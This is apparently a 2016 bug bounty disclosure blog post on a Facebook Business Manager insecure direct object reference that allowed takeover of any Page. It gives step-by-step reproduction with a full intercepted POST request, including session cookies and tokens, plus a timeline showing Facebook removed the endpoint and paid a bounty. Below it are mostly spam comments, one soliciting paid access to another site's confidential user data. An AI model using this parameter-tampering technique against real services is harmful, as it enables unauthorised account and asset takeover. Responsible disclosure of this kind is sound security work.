Facebook Page Takeover

Outline:

This is around an Insecure direct object reference vulnerability in Facebook Business Manager using which an attacker can takeover the Facebook pages in less than 10 Seconds .

About Facebook Page:

Pages are for brands, businesses, organisations and public figures to create a presence on Facebook, whereas profiles represent individual people. Anyone with an account can create a Page or help manage one, if they’ve been given a role on the Page like admin or editor. People who like a Page and their friends can get updates in News Feed.With a Facebook Page, you can easily show customers what you’re all about.

Keep new and existing customers engaged by:

  • Listing details – such as opening hours and contact info
  • Adding big, beautiful photos and images
  • Posting updates to let people know the latest about your business

About Facebook Business Manager:

Business Manager lets businesses more securely share and control access to their ad accounts, Pages, and other assets on Facebook. Anyone in a business can see all of the Pages and ad accounts they work on in one place, without sharing login information or being connected to their coworkers on Facebook. When you sign into Business Manager, we’ll show you a quick overview of the ad accounts and Pages that you work on. If you’re the admin for your business, go to Business Settings to add new people, Pages, ad accounts and other assets to your business.

Business Manager is a new, more secure tool for managing access to Pages and ad accounts, geared towards companies who need to give different permissions to lots of people.

Business Manager lets you:

  • Manage access to Pages and ad accounts: Clearly see who has access to your Pages and ad accounts and remove or change their permissions.
  • Keep your work separate: Get access to Pages and ad accounts without being friends with your coworkers on Facebook. Learn more about what your coworkers can see about you.

Vulnerability Description:

Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.

Reference: Insecure Direct Object References

Reproduction Instructions / Proof of Concept:

Here i will show you the security vulnerability which can Takeover any Facebook page.

Prerequisite:

1. Facebook Business Account (2 no’s).

One as own business and other can be any test account business.

Here i use my account business id as :  907970555981524

And another one , any partner id so i will choose it from my test account.  991079870975788

2. Add a partner using my own business and just intercept the request.

Now you can see the Vulnerable Request :

POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1

Host: business.facebook.com

Connection: close

Content-Length: 436

Origin: https://business.facebook.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Accept: */*

Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524

Accept-Encoding: gzip, deflate, br

Accept-Language: en-US,en;q=0.8

Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6

parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733

3. Change asset id to the page you want to hack. and also interchange the parent_business_id with agency_id.

ie,

parent_business_id= 991079870975788

agency_id= 907970555981524

asset_id =190313461381022

role= MANAGER

4. Resend the request.

Request send successfully. Page added to the Facebook Business Manager of the attacker with permission role Manager.

5. Assigned me as the admin of the page , which was added by the exploit.

6. Browse the page using the Facebook Business Manager and do desire amount of things!.

 POC Video:

Impact:

Takeover any Facebook Page ( Eg: Pages of  Bill Gates , Narendra Modi , Barack Obama )  and can do desire amount of actions including critical actions like page deletion.

Timeline:

All timestamps are in India Standard Time. I omitted a few unimportant interactions.

  • 29 August 2016 at 00:08 : Initial report
  • 30 August 2016 at 06:52 : Bug acknowledged by security team member Nancy
  • 30 August 2016 at 12:29  : Security team member Neal Poole informed me that “Issue should be addressed (we’ve taken down the endpoint temporarily and are going to be removing it entirely)”.
  • 6 September 2016 at 21:30 : I replied confirming that the bug was patched.
  • 6 September 2016 at 23:04   :Security team member William informed me that “We have looked into this issue and believe that the vulnerability has been patched. Please follow up with us if you believe that the patch does not resolve this issue.”
  • 6 September 2016 at 23:04   : I replied Permanent fix patched the bug.
  • 16 September 2016 at 01:24  : Security team member Rusty informed me that “I wanted to reach out and inform you that we have decided to pay you a bounty of 16,000 dollars for this report. A majority of the bounty is for the page takeover capability of your exploit, but while investigating your report we discovered and fixed another issue as well, so the bounty is a little higher because of that. You can expect the standard longer payout message later in the week.”
  • 16 September 2016 at 02:32  : Bounty of $16,000 awarded.

Bounty of $16,000 awarded

 

 

122 thoughts on “Facebook Page Takeover

  1. Great work. I’m an “old fart” in the industry and I love the curiosity and ingenuity that exists in this industry. You are going to do well in this field. I am very excited about the skills that are coming out of India as well. Many fall for the Indian stereotype and I applaud you for doing your part to squash it. Drinks on me if we ever meet at a con. Congrats on joining the Million Rupee Bug Bounty Club.

  2. Hi I really did not get what is the goal of bug ?
    The request you intercepted already had the legal business_id , agent and role, you intercepted it under legal user and just changed these id-s, as the same you’ve done it as a legal user does , but not over facebook form but over interceptor. And all session is under HTTPS and cookies which will decrease the chance of interception such request to 0.
    So where is the bug ? I am really in details of the bug. Correct me if I am wrong.

  3. I simply want to mention I am all new to blogs and seriously liked your web-site. Probably I’m planning to bookmark your blog . You amazingly come with beneficial well written articles. Appreciate it for revealing your web site.

  4. you are actually a just right webmaster. The web site loading velocity is incredible. It kind of feels that you’re doing any unique trick. Furthermore, The contents are masterwork. you’ve performed a magnificent task on this matter!

  5. Pingback: Google
  6. I went over this web site and I think you have a lot of good info , saved to favorites (:Please take a look at the web sites we adhere to, such as this a single, because it represents our picks from the web.

  7. Great, I would like your service, how much I would charge for access to confidential information from this website, I would like to access any account or know the IP number for each user.

    web: dragonbound.net

  8. you are in point of fact a just right webmaster. The site loading velocity is amazing. It sort of feels that you are doing any distinctive trick. Furthermore, The contents are masterpiece. you’ve performed a magnificent process in this subject! beeegddegfgb

  9. I have been surfing online more than 3 hours today, yet I never found any interesting article like yours. It is pretty worth enough for me. In my view, if all webmasters and bloggers made good content as you did, the internet will be much more useful than ever before. gkefeaegdeee

  10. Hello there! Nice website you have here. I do not do this very often, but I am just trying to spread the word that if anyone out there is searching for a place to submit your website to mini-search engines, aka, web directories, you can try out my gigantic list at my website. I would appreciate it if you could approve this comment so that I can help other webmasters out there to gain better exposure for their online business. Thank you in advance and I highly appreciate your help! Thanks!!!

  11. Nice read, I just passed this onto a friend who was doing some research on that. And he actually bought me lunch since I found it for him smile Therefore let me rephrase that: Thank you for lunch! “To be 70 years young is sometimes far more cheerful and hopeful than to be 40 years old.” by Oliver Wendell Holmes.

  12. Hey very cool web site!! Man .. Excellent .. Amazing .. I will bookmark your site and take the feeds also…I am happy to find so many useful information here in the post, we need work out more strategies in this regard, thanks for sharing. . . . . .

  13. I will right away grasp your rss as I can’t in finding your email subscription hyperlink or e-newsletter service. Do you’ve any? Please let me recognize so that I may subscribe. Thanks.|

  14. I do believe all the ideas you have offered for your post. They’re very convincing and will certainly work. Nonetheless, the posts are too quick for novices. Could you please extend them a little from subsequent time? Thanks for the post.

  15. Hey there would you mind stating which blog platform you’re using? I’m looking to start my own blog in the near future but I’m having a difficult time making a decision between BlogEngine/Wordpress/B2evolution and Drupal. The reason I ask is because your design and style seems different then most blogs and I’m looking for something unique. P.S Apologies for getting off-topic but I had to ask!

  16. I do agree with all the ideas you’ve presented in your post. They’re really convincing and will certainly work. Still, the posts are very short for beginners. Could you please extend them a little from next time? Thanks for the post.

  17. Attractive portion of content. I just stumbled upon your blog and in accession capital to claim that I get actually enjoyed account your weblog posts. Any way I’ll be subscribing for your augment and even I success you get right of entry to consistently quickly.

  18. Pingback: Google
  19. Pingback: bendable vibrator
  20. Pingback: Penis Sleeve
  21. Pingback: bulletin board one

Leave a Reply